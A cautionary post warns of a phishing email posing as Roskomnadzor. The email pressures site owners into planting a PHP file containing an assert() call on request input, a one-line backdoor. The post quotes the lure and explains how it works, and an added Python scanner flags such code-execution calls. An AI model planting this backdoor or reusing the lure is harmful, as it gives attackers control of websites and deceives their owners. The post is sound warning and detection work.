An unusual scam under the guise of Roskomnadzor
A cautionary post, since this scam is quite unusual and rides the wave of blocking by Roskomnadzor.
I think many have heard that Roskomnadzor has recently hired many employees who search the Internet for prohibited information and block pages. In parallel, Roskomnadzor is compiling a "register of information dissemination organizers" (the law on bloggers). Habr was added to this list on September 25, 2014.

In any case, Roskomnadzor has earned a rather poor reputation, and it is confident that site owners are afraid of ending up on any of its lists.
Today a good friend of mine sent me a letter saying that her site, which has relatively little traffic, had been entered into this register.
The text of the letter is below; spelling and punctuation are preserved.
You have received this notification from the Federal Service for Supervision of Communications, Information Technologies and Mass Communications (Roskomnadzor) because you are the administrator of the www.yandex.ru domain name on the Internet.
In accordance with Federal Law No. 97-FZ of May 5, 2014 "On Amendments to the Federal Law 'On Information, Information Technologies and the Protection of Information'" and on the basis of a court decision (Novokuybyshevsky City Court of the Samara Region) of August 11, 2015, No. 21618/2015, your site www.yandex.ru has been entered into the register of organizers of the dissemination of information on the Internet and of sites and/or pages of sites on the Internet that host publicly available information and are accessed by more than three thousand Internet users per day.
To identify you as the administrator of the www.yandex.ru domain name, you need to:
1. Create a reestr folder in the root directory of your site
2. Create a reestr-id198617.php file in this folder containing the following text:
<? php
/* Confirmation of the domain name www.yandex.ru */
assert(stripslashes($_REQUEST[roskomnadzor]));
* In <? php the space between <? and php must be removed.
The path to the file on your site should be the following: www.yandex.ru/reestr/reestr-id128032.php
If within 72 hours of receiving this letter you do not identify yourself as the administrator of the www.yandex.ru domain name by following the instructions above, your website www.yandex.ru will be blacklisted by Internet providers and blocked in the Russian Federation.
- Respectfully,
I am sure many have realized that this is a scam, but the scammers did everything they could to get less experienced users to follow the instructions: the letter came from zapret-info@roskomnadzor.org, so an inexperienced user might think it really was sent by this organization. Visiting roskomnadzor.org redirects the user to rkn.gov.ru, which creates the illusion of a real site and domain. The domain roskomnadzor.org was registered 6 days ago.

Little is required of the user: create a directory, create a file, and write one line in that file.
The scam is that the user is asked to create a file containing seemingly harmless PHP code. However, a look at the description of the assert function makes it immediately clear that the attackers will simply execute whatever code is passed in the roskomnadzor variable.
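For site owners who want to check whether such a file has already been planted, here is a triage scanner, added as an example and not part of the original post. It flags PHP calls to assert and to similar code- or command-executing functions whose argument contains request input; the function names and the list of flagged functions are assumptions of this sketch, and it is a text heuristic that errs toward false positives.

```python
import re
from pathlib import Path

# Calls that evaluate a string as PHP code or run it as a shell command.
SINKS = ("assert", "eval", "create_function", "system", "exec", "passthru", "shell_exec")
SINK_RE = re.compile(r"(?<![\w$>])(" + "|".join(SINKS) + r")\s*\(", re.IGNORECASE)
# Request superglobals; tolerates the "$ _ REQUEST" spacing seen in mangled copies.
SOURCE_RE = re.compile(r"\$\s*_\s*(REQUEST|GET|POST|COOKIE)\b")

# Constructed samples: the file from the letter, and harmless uses of assert().
SAMPLE_BACKDOOR = "<?php\n/* Confirmation */\nassert(stripslashes($_REQUEST[roskomnadzor]));\n"
SAMPLE_BENIGN = "<?php\n$n = (int) $_GET['n'];\nassert($n >= 0);\nmy_assert($_GET['n']);\n"


def call_argument(text, open_paren):
    """Return the text between the '(' at open_paren and its matching ')'."""
    depth = 0
    for i in range(open_paren, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[open_paren + 1:i]
    return text[open_paren + 1:]  # unbalanced: treat the rest as the argument


def find_request_driven_exec(php_source):
    """Return (line, sink) for every sink call whose argument contains request input."""
    hits = []
    for m in SINK_RE.finditer(php_source):
        if SOURCE_RE.search(call_argument(php_source, m.end() - 1)):
            line = php_source.count("\n", 0, m.start()) + 1
            hits.append((line, m.group(1).lower()))
    return hits


def scan_tree(root):
    """Map each .php file under root to its hits, skipping files with none."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = find_request_driven_exec(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


if __name__ == "__main__":
    print(find_request_driven_exec(SAMPLE_BACKDOOR))
    print(find_request_driven_exec(SAMPLE_BENIGN))
```

Run scan_tree against the site's document root; any hit, especially in a recently created directory such as reestr, deserves a manual look.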